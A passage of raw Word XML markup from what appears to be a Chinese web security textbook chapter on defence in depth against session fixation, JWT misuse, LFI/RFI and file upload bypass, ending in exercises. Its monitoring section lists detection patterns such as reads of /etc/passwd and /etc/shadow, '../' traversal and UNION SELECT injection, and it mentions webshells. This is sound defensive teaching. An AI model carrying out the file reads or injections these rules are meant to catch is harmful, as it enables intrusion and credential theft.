        </w:rPr>
        <w:t xml:space="preserve">Lax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，可有效防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">驱动的会话滥用（已在第十章详述）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话固定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心防御措施是“登录后强制轮换会话标识”。当用户完成认证后，服务端必须立即废弃旧的会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并颁发一个新的、未被外部预设的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，如此即使攻击者事先制造了一个固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并诱导受害者使用，登录完成后该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也会失效。防御对照：蓝队可通过检查应用是否在认证成功后返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头并更改会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来验证此修复；同时在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则中，可对包含外部可控会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的请求进行标记。针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">误用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，纵深防御的关键是固守“验证优先于信任”的原则。服务器必须显式指定允许的算法列表（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RS256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HS256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），并拒绝</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的令牌；必须验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nbf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等声明，且任何声明不符均应立即拒绝。签名密钥必须得到妥善保护：对称密钥（HMAC）的长度不得低于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位且不可硬编码；非对称密钥的私钥应存储于密钥管理系统或硬件安全模块（HSM）中，应用程序只持有公钥验证。蓝队还可在网关处检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的异常声明或超长过期时间，并及时轮换密钥。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">输入与文件平面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是抵御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI/RFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与文件上传绕过的前沿。其总原则是“输入校验与路径隔离并重，且永不以黑名单为唯一防线”。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">路径遍历与文件包含防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在所有涉及文件系统操作的代码中，坚决避免直接将用户输入拼接到路径字符串中。正确的做法是，将用户输入参数映射到一个受控的索引或白名单值（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?page=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/content/page1.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），从根本上消除路径穿越的可能。若必须使用用户提供的文件名，则必须先调用操作系统或语言提供的路径规范化函数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">realpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Path.normalize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），然后将规范化后的绝对路径与允许基目录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/app/data/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）进行前缀比对，一旦出现路径外逃行为即刻阻断。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用，应在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，彻底禁用远程文件包含。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：白名单优于黑名单的论断在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节已通过扩展名双写、MIME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造等案例得到验证。纵深防御要求在上传流程中实施多层校验：第一层，检查扩展名是否属于预定义的白名单（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.jpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），白名单须明确枚举且不包含可执行的后缀；第二层，使用文件魔术数字（magic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes）校验内容类型，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JPEG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件应以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FF D8 FF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开头，而非仅依赖客户端提供的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；第三层，将文件重命名为不可预测的随机文件名（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID），并将文件存储在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录之外，或存储于专用静态文件服务器上；第四层，若文件必须存放于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可达目录，则须通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.htaccess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或服务器配置禁止该目录下文件的脚本执行权限（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RemoveHandler .php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。防御对照：蓝队可在文件系统审计中监测非脚本目录下的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.jsp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等文件的新建行为，并对上传成功后的异常外联请求进行告警。同时，所有上传文件在存储前应经过反病毒引擎或沙箱扫描（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ClamAV），虽然攻击者可能使用免杀技术绕过，但这增加了攻击成本并提供了额外的检测点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控与审计平面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为整个纵深防御体系提供闭环可见性。每条防线产生的日志和事件，若不能被有效聚合与分析，那么攻击者就可能在无察觉的情况下长期潜伏。认证层的监控应聚焦于：①同一账户在短时间内的大量失败登录尝试；②同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对众多账户的密码喷射攻击；③认证成功后的异常地理或设备指纹变更。会话层的异常包括：④会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的突然跳变（可能与会话固定利用有关）；⑤短时间内同一会话在不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">间的快速切换（可能为令牌窃取）。文件层的威胁信号包括：⑥对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统目录等敏感路径的访问尝试；⑦Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程对非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录的读取或写入操作；⑧上传目录中出现不符合白名单扩展名的文件。蓝队实践上通常采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相结合的方式：WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能够以规则形式拦截已知攻击模式（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">深度遍历、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入），但它属于纵深防御的辅助层而非根治手段，因为攻击者可以通过编码、混淆或协议级变形绕过（见第九章注入纵深防御）；SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则负责关联多维日志，基于行为基线和威胁情报产生高质量的告警，交由安全分析师研判。同时，数据库审计规则应覆盖异常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询、批量数据导出、以及特权操作，这些检测点亦能捕获通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进一步转化而来的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入或命令执行行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御的四个平面不是彼此孤立的竖井。例如，凭借文件上传漏洞获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Webshell，通常会试图建立持久会话；此时，会话平面的轮换令牌与后台的异常会话监测，就可能阻遏攻击者维持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的利用链。同样，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取到的配置文件若包含数据库口令，攻击者可能会转向数据库直接认证；身份平面的数据库用户最小权限原则，将在此时限制攻击者的横向移动。这就印证了纵深防御的核心价值：任一单点防御均可能被突破，但多层控制的组合使得攻击者持续暴露的风险大大提高，而蓝队检测到攻击的概率也随之增加。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1：会话固定攻击的原理与核心防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">问题：简述会话固定攻击的基本原理，并说明为什么“在用户认证成功后立即更换会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID”能够从根本上阻止这类攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中会话固定的流程：攻击者如何获得一个有效的会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，以及如何让受害者使用该</w:t>
      </w:r>
      <w:r>
